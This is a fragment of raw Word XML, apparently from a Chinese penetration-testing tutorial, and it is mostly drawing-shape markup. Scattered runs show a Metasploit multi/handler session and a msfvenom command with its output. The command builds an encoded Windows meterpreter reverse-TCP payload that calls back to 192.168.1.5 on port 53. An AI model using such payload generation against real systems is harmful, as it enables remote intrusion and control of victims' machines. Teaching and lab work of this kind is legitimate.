        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:747.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14957" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14957;width:82;height:322" coordorigin="1177,14957" coordsize="82,322" path="m1217,14972l1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14973,1217,14973,1217,14973,1217,14973,1217,14973,1217,14974,1217,14974,1217,14974,1217,14975,1217,14975,1217,14975,1217,14976,1217,14976,1217,14977,1217,14977,1217,14978,1217,14979,1217,14979,1217,14980,1217,14981,1217,14981,1217,14982,1217,14983,1217,14984,1217,14985,1217,14986,1217,14987,1217,14988,1217,14989,1217,14990,1217,14991,1217,14992,1217,14994,1217,14995,1217,14997,1217,14998,1217,15000,1217,15001,1217,15003,1217,15005,1217,15006,1217,15008,1217,15010,1217,15012,1217,15014,1217,15016,1217,15018,1217,15020,1217,15023,1217,15025,1217,15028,1217,15030,1217,15033,1217,15035,1217,15038,1217,15041,1217,15044,1217,15047,1217,15050,1217,15053,1217,15056,1217,15059,1217,15063,1217,15066,1217,15070,1217,15073,1217,15077,1217,15081,1217,15085,1217,15089,1217,15093,1217,15097,1217,15101,1217,15106,1217,15110,1217,15115,1217,15119,1217,15124,1217,15129,1217,15134,1217,15139,1217,15144,1217,15150,1217,15155,1217,15161,1217,15166,1217,15172,1217,15178,1217,15184,1217,15190,1217,15196,1217,15202,1217,15209,1217,15215,1217,15222,1217,15229,1217,15235,1217,15242,1217,15250,1217,15257,1217,15264,1217,15272e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:762.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15257" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:15257;width:82;height:322" coordorigin="1177,15257" coordsize="82,322" path="m1217,15272l1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15273,1217,15273,1217,15273,1217,15273,1217,15273,1217,15274,1217,15274,1217,15274,1217,15274,1217,15275,1217,15275,1217,15276,1217,15276,1217,15277,1217,15277,1217,15278,1217,15278,1217,15279,1217,15279,1217,15280,1217,15281,1217,15281,1217,15282,1217,15283,1217,15284,1217,15285,1217,15286,1217,15287,1217,15288,1217,15289,1217,15290,1217,15291,1217,15293,1217,15294,1217,15295,1217,15297,1217,15298,1217,15300,1217,15301,1217,15303,1217,15305,1217,15306,1217,15308,1217,15310,1217,15312,1217,15314,1217,15316,1217,15318,1217,15321,1217,15323,1217,15325,1217,15328,1217,15330,1217,15333,1217,15335,1217,15338,1217,15341,1217,15344,1217,15347,1217,15350,1217,15353,1217,15356,1217,15360,1217,15363,1217,15366,1217,15370,1217,15374,1217,15377,1217,15381,1217,15385,1217,15389,1217,15393,1217,15397,1217,15402,1217,15406,1217,15410,1217,15415,1217,15420,1217,15424,1217,15429,1217,15434,1217,15439,1217,15445,1217,15450,1217,15455,1217,15461,1217,15466,1217,15472,1217,15478,1217,15484,1217,15490,1217,15496,1217,15502,1217,15509,1217,15515,1217,15522,1217,15529,1217,15536,1217,15543,1217,15550,1217,15557,1217,15564,1217,15572e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:100.800pt;width:467.400pt;height:390.6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msf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exploit(multi/handler)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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体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-j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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-z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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payloa</w:t>
      </w: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d生成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2471" w:firstLine="0"/>
      </w:pP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root@John:/tmp#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msfvenom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-a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x86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-p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windows/meterpreter/reverse_tcp_uuid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LHOST=192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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LPORT=53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EnableStageEncoding=true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stageencoder=x86/shikata_ga_nai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-e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-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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csharp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/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: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warning: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constant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OpenSSL::SSL::SSLContext::METHODS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17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>is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deprecated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1631" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>No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platform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was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selected,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choosing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Msf::Module::Platform::Windows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from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the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payload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Found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8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spacing w:val="9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compatible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> 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encoders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="330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Attempting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to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encode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payload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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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iterations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of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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succeeded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size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401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(iteration=0)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succeeded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size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428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(iteration=1)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succeeded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size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455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(iteration=2)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succeeded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size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482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(iteration=3)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succeeded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size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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509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(iteration=4)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x86/shikata_ga_nai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chosen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with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final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size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509</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6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Payload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size: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509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bytes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8.874pt;margin-top:49.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:997;width:82;height:322" coordorigin="1177,997" coordsize="82,322" path="m1217,1000l1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1001,1217,1001,1217,1001,1217,1001,1217,1001,1217,1002,1217,1002,1217,1002,1217,1003,1217,1003,1217,1003,1217,1004,1217,1004,1217,1005,1217,1005,1217,1006,1217,1007,1217,1007,1217,1008,1217,1009,1217,1009,1217,1010,1217,1011,1217,1012,1217,1013,1217,1014,1217,1015,1217,1016,1217,1017,1217,1018,1217,1019,1217,1020,1217,1022,1217,1023,1217,1025,1217,1026,1217,1028,1217,1029,1217,1031,1217,1032,1217,1034,1217,1036,1217,1038,1217,1040,1217,1042,1217,1044,1217,1046,1217,1048,1217,1051,1217,1053,1217,1056,1217,1058,1217,1061,1217,1063,1217,1066,1217,1069,1217,1072,1217,1075,1217,1078,1217,1081,1217,1084,1217,1087,1217,1091,1217,1094,1217,1098,1217,1101,1217,1105,1217,1109,1217,1113,1217,1117,1217,1121,1217,1125,1217,1129,1217,1134,1217,1138,1217,1143,1217,1147,1217,1152,1217,1157,1217,1162,1217,1167,1217,1172,1217,1178,1217,1183,1217,1189,1217,1194,1217,1200,1217,1206,1217,1212,1217,1218,1217,1224,1217,1230,1217,1237,1217,1243,1217,1250,1217,1257,1217,1263,1217,1270,1217,1278,1217,1285,1217,1292,1217,1300e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:64.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1297;width:82;height:322" coordorigin="1177,1297" coordsize="82,322" path="m1217,1300l1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1300,1217,1301,1217,1301,1217,1301,1217,1301,1217,1301,1217,1302,1217,1302,1217,1302,1217,1302,1217,1303,1217,1303,1217,1304,1217,1304,1217,1304,1217,1305,1217,1305,1217,1306,1217,1307,1217,1307,1217,1308,1217,1309,1217,1309,1217,1310,1217,1311,1217,1312,1217,1313,1217,1314,1217,1315,1217,1316,1217,1317,1217,1318,1217,1319,1217,1321,1217,1322,1217,1323,1217,1325,1217,1326,1217,1328,1217,1329,1217,1331,1217,1333,1217,1334,1217,1336,1217,1338,1217,1340,1217,1342,1217,1344,1217,1346,1217,1349,1217,1351,1217,1353,1217,1356,1217,1358,1217,1361,1217,1363,1217,1366,1217,1369,1217,1372,1217,1375,1217,1378,1217,1381,1217,1384,1217,1387,1217,1391,1217,1394,1217,1398,1217,1401,1217,1405,1217,1409,1217,1413,1217,1417,1217,1421,1217,1425,1217,1429,1217,1434,1217,1438,1217,1443,1217,1448,1217,1452,1217,1457,1217,1462,1217,1467,1217,1472,1217,1478,1217,1483,1217,1489,1217,1494,1217,1500,1217,1506,1217,1512,1217,1518,1217,1524,1217,1530,1217,1537,1217,1543,1217,1550,1217,1557,1217,1564,1217,1571,1217,1578,1217,1585,1217,1592,1217,1600e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:79.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1597" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1597;width:82;height:322" coordorigin="1177,1597" coordsize="82,322" path="m1217,1600l1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1600,1217,1601,1217,1601,1217,1601,1217,1601,1217,1601,1217,1601,1217,1602,1217,1602,1217,1602,1217,1603,1217,1603,1217,1603,1217,1604,1217,1604,1217,1605,1217,1605,1217,1606,1217,1606,1217,1607,1217,1607,1217,1608,1217,1609,1217,1610,1217,1610,1217,1611,1217,1612,1217,1613,1217,1614,1217,1615,1217,1616,1217,1617,1217,1618,1217,1620,1217,1621,1217,1622,1217,1623,1217,1625,1217,1626,1217,1628,1217,1629,1217,1631,1217,1633,1217,1635,1217,1636,1217,1638,1217,1640,1217,1642,1217,1644,1217,1646,1217,1649,1217,1651,1217,1653,1217,1656,1217,1658,1217,1661,1217,1664,1217,1666,1217,1669,1217,1672,1217,1675,1217,1678,1217,1681,1217,1684,1217,1688,1217,1691,1217,1694,1217,1698,1217,1702,1217,1705,1217,1709,1217,1713,1217,1717,1217,1721,1217,1725,1217,1730,1217,1734,1217,1739,1217,1743,1217,1748,1217,1753,1217,1757,1217,1762,1217,1767,1217,1773,1217,1778,1217,1783,1217,1789,1217,1794,1217,1800,1217,1806,1217,1812,1217,1818,1217,1824,1217,1830,1217,1837,1217,1843,1217,1850,1217,1857,1217,1864,1217,1871,1217,1878,1217,1885,1217,1892,1217,1900e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:94.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1897" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1897;width:82;height:322" coordorigin="1177,1897" coordsize="82,322" path="m1217,1900l1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1900,1217,1901,1217,1901,1217,1901,1217,1901,1217,1901,1217,1901,1217,1902,1217,1902,1217,1902,1217,1902,1217,1903,1217,1903,1217,1903,1217,1904,1217,1904,1217,1905,1217,1905,1217,1906,1217,1906,1217,1907,1217,1908,1217,1908,1217,1909,1217,1910,1217,1911,1217,1911,1217,1912,1217,1913,1217,1914,1217,1915,1217,1916,1217,1917,1217,1918,1217,1920,1217,1921,1217,1922,1217,1924,1217,1925,1217,1926,1217,1928,1217,1930,1217,1931,1217,1933,1217,1935,1217,1937,1217,1938,1217,1940,1217,1942,1217,1944,1217,1947,1217,1949,1217,1951,1217,1954,1217,1956,1217,1958,1217,1961,1217,1964,1217,1966,1217,1969,1217,1972,1217,1975,1217,1978,1217,1981,1217,1984,1217,1988,1217,1991,1217,1995,1217,1998,1217,2002,1217,2006,1217,2009,1217,2013,1217,2017,1217,2021,1217,2026,1217,2030,1217,2034,1217,2039,1217,2043,1217,2048,1217,2053,1217,2058,1217,2063,1217,2068,1217,2073,1217,2078,1217,2083,1217,2089,1217,2095,1217,2100,1217,2106,1217,2112,1217,2118,1217,2124,1217,2131,1217,2137,1217,2144,1217,2150,1217,2157,1217,2164,1217,2171,1217,2178,1217,2185,1217,2193,1217,2200e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:109.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2197" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2197;width:82;height:322" coordorigin="1177,2197" coordsize="82,322" path="m1217,2200l1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2200,1217,2201,1217,2201,1217,2201,1217,2201,1217,2201,1217,2201,1217,2202,1217,2202,1217,2202,1217,2202,1217,2203,1217,2203,1217,2203,1217,2204,1217,2204,1217,2204,1217,2205,1217,2205,1217,2206,1217,2207,1217,2207,1217,2208,1217,2208,1217,2209,1217,2210,1217,2211,1217,2212,1217,2212,1217,2213,1217,2214,1217,2215,1217,2216,1217,2217,1217,2219,1217,2220,1217,2221,1217,2222,1217,2224,1217,2225,1217,2227,1217,2228,1217,2230,1217,2231,1217,2233,1217,2235,1217,2237,1217,2239,1217,2241,1217,2243,1217,2245,1217,2247,1217,2249,1217,2251,1217,2254,1217,2256,1217,2259,1217,2261,1217,2264,1217,2267,1217,2269,1217,2272,1217,2275,1217,2278,1217,2281,1217,2285,1217,2288,1217,2291,1217,2295,1217,2298,1217,2302,1217,2306,1217,2309,1217,2313,1217,2317,1217,2321,1217,2326,1217,2330,1217,2334,1217,2339,1217,2343,1217,2348,1217,2353,1217,2358,1217,2363,1217,2368,1217,2373,1217,2378,1217,2384,1217,2389,1217,2395,1217,2400,1217,2406,1217,2412,1217,2418,1217,2424,1217,2431,1217,2437,1217,2444,1217,2450,1217,2457,1217,2464,1217,2471,1217,2478,1217,2485,1217,2493,1217,2500e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:124.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2497;width:82;height:322" coordorigin="1177,2497" coordsize="82,322" path="m1217,2500l1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2500,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2501,1217,2502,1217,2502,1217,2502,1217,2502,1217,2503,1217,2503,1217,2503,1217,2504,1217,2504,1217,2505,1217,2505,1217,2506,1217,2506,1217,2507,1217,2507,1217,2508,1217,2509,1217,2509,1217,2510,1217,2511,1217,2512,1217,2513,1217,2513,1217,2514,1217,2515,1217,2516,1217,2518,1217,2519,1217,2520,1217,2521,1217,2523,1217,2524,1217,2525,1217,2527,1217,2528,1217,2530,1217,2532,1217,2533,1217,2535,1217,2537,1217,2539,1217,2541,1217,2543,1217,2545,1217,2547,1217,2549,1217,2551,1217,2554,1217,2556,1217,2559,1217,2561,1217,2564,1217,2567,1217,2570,1217,2572,1217,2575,1217,2578,1217,2582,1217,2585,1217,2588,1217,2591,1217,2595,1217,2598,1217,2602,1217,2606,1217,2610,1217,2614,1217,2618,1217,2622,1217,2626,1217,2630,1217,2634,1217,2639,1217,2644,1217,2648,1217,2653,1217,2658,1217,2663,1217,2668,1217,2673,1217,2678,1217,2684,1217,2689,1217,2695,1217,2701,1217,2706,1217,2712,1217,2718,1217,2725,1217,2731,1217,2737,1217,2744,1217,2750,1217,2757,1217,2764,1217,2771,1217,2778,1217,2786,1217,2793,1217,2800e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:139.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2797" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:2797;width:82;height:322" coordorigin="1177,2797" coordsize="82,322" path="m1217,2800l1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2800,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2801,1217,2802,1217,2802,1217,2802,1217,2802,1217,2803,1217,2803,1217,2803,1217,2804,1217,2804,1217,2804,1217,2805,1217,2805,1217,2806,1217,2806,1217,2807,1217,2807,1217,2808,1217,2809,1217,2809,1217,2810,1217,2811,1217,2812,1217,2813,1217,2814,1217,2815,1217,2816,1217,2817,1217,2818,1217,2819,1217,2820,1217,2821,1217,2823,1217,2824,1217,2825,1217,2827,1217,2828,1217,2830,1217,2832,1217,2833,1217,2835,1217,2837,1217,2839,1217,2841,1217,2843,1217,2845,1217,2847,1217,2849,1217,2852,1217,2854,1217,2856,1217,2859,1217,2862,1217,2864,1217,2867,1217,2870,1217,2873,1217,2876,1217,2879,1217,2882,1217,2885,1217,2888,1217,2892,1217,2895,1217,2899,1217,2902,1217,2906,1217,2910,1217,2914,1217,2918,1217,2922,1217,2926,1217,2930,1217,2935,1217,2939,1217,2944,1217,2948,1217,2953,1217,2958,1217,2963,1217,2968,1217,2973,1217,2979,1217,2984,1217,2989,1217,2995,1217,3001,1217,3007,1217,3013,1217,3019,1217,3025,1217,3031,1217,3037,1217,3044,1217,3051,1217,3057,1217,3064,1217,3071,1217,3078,1217,3086,1217,3093,1217,3101e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:154.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3097;width:82;height:322" coordorigin="1177,3097" coordsize="82,322" path="m1217,3101l1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3101,1217,3102,1217,3102,1217,3102,1217,3102,1217,3102,1217,3103,1217,3103,1217,3103,1217,3104,1217,3104,1217,3104,1217,3105,1217,3105,1217,3106,1217,3106,1217,3107,1217,3108,1217,3108,1217,3109,1217,3110,1217,3110,1217,3111,1217,3112,1217,3113,1217,3114,1217,3115,1217,3116,1217,3117,1217,3118,1217,3119,1217,3120,1217,3122,1217,3123,1217,3124,1217,3126,1217,3127,1217,3129,1217,3130,1217,3132,1217,3134,1217,3135,1217,3137,1217,3139,1217,3141,1217,3143,1217,3145,1217,3147,1217,3149,1217,3152,1217,3154,1217,3157,1217,3159,1217,3162,1217,3164,1217,3167,1217,3170,1217,3173,1217,3176,1217,3179,1217,3182,1217,3185,1217,3188,1217,3192,1217,3195,1217,3199,1217,3202,1217,3206,1217,3210,1217,3214,1217,3218,1217,3222,1217,3226,1217,3230,1217,3235,1217,3239,1217,3244,1217,3249,1217,3253,1217,3258,1217,3263,1217,3268,1217,3273,1217,3279,1217,3284,1217,3290,1217,3295,1217,3301,1217,3307,1217,3313,1217,3319,1217,3325,1217,3331,1217,3338,1217,3344,1217,3351,1217,3358,1217,3364,1217,3371,1217,3379,1217,3386,1217,3393,1217,3401e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:169.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3397;width:82;height:322" coordorigin="1177,3397" coordsize="82,322" path="m1217,3401l1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3401,1217,3402,1217,3402,1217,3402,1217,3402,1217,3402,1217,3403,1217,3403,1217,3403,1217,3403,1217,3404,1217,3404,1217,3405,1217,3405,1217,3406,1217,3406,1217,3407,1217,3407,1217,3408,1217,3408,1217,3409,1217,3410,1217,3410,1217,3411,1217,3412,1217,3413,1217,3414,1217,3415,1217,3416,1217,3417,1217,3418,1217,3419,1217,3420,1217,3422,1217,3423,1217,3424,1217,3426,1217,3427,1217,3429,1217,3430,1217,3432,1217,3434,1217,3435,1217,3437,1217,3439,1217,3441,1217,3443,1217,3445,1217,3447,1217,3450,1217,3452,1217,3454,1217,3457,1217,3459,1217,3462,1217,3464,1217,3467,1217,3470,1217,3473,1217,3476,1217,3479,1217,3482,1217,3485,1217,3489,1217,3492,1217,3495,1217,3499,1217,3503,1217,3506,1217,3510,1217,3514,1217,3518,1217,3522,1217,3526,1217,3531,1217,3535,1217,3539,1217,3544,1217,3549,1217,3553,1217,3558,1217,3563,1217,3568,1217,3574,1217,3579,1217,3584,1217,3590,1217,3595,1217,3601,1217,3607,1217,3613,1217,3619,1217,3625,1217,3631,1217,3638,1217,3644,1217,3651,1217,3658,1217,3665,1217,3672,1217,3679,1217,3686,1217,3693,1217,3701e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:184.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3697" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3697;width:82;height:322" coordorigin="1177,3697" coordsize="82,322" path="m1217,3701l1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3701,1217,3702,1217,3702,1217,3702,1217,3702,1217,3702,1217,3703,1217,3703,1217,3703,1217,3703,1217,3704,1217,3704,1217,3704,1217,3705,1217,3705,1217,3706,1217,3706,1217,3707,1217,3707,1217,3708,1217,3709,1217,3709,1217,3710,1217,3711,1217,3711,1217,3712,1217,3713,1217,3714,1217,3715,1217,3716,1217,3717,1217,3718,1217,3719,1217,3721,1217,3722,1217,3723,1217,3724,1217,3726,1217,3727,1217,3729,1217,3730,1217,3732,1217,3734,1217,3736,1217,3737,1217,3739,1217,3741,1217,3743,1217,3745,1217,3748,1217,3750,1217,3752,1217,3754,1217,3757,1217,3759,1217,3762,1217,3765,1217,3767,1217,3770,1217,3773,1217,3776,1217,3779,1217,3782,1217,3785,1217,3789,1217,3792,1217,3796,1217,3799,1217,3803,1217,3806,1217,3810,1217,3814,1217,3818,1217,3822,1217,3826,1217,3831,1217,3835,1217,3840,1217,3844,1217,3849,1217,3854,1217,3858,1217,3863,1217,3869,1217,3874,1217,3879,1217,3884,1217,3890,1217,3895,1217,3901,1217,3907,1217,3913,1217,3919,1217,3925,1217,3932,1217,3938,1217,3944,1217,3951,1217,3958,1217,3965,1217,3972,1217,3979,1217,3986,1217,3994,1217,4001e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:199.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3997" coordsize="82,322">
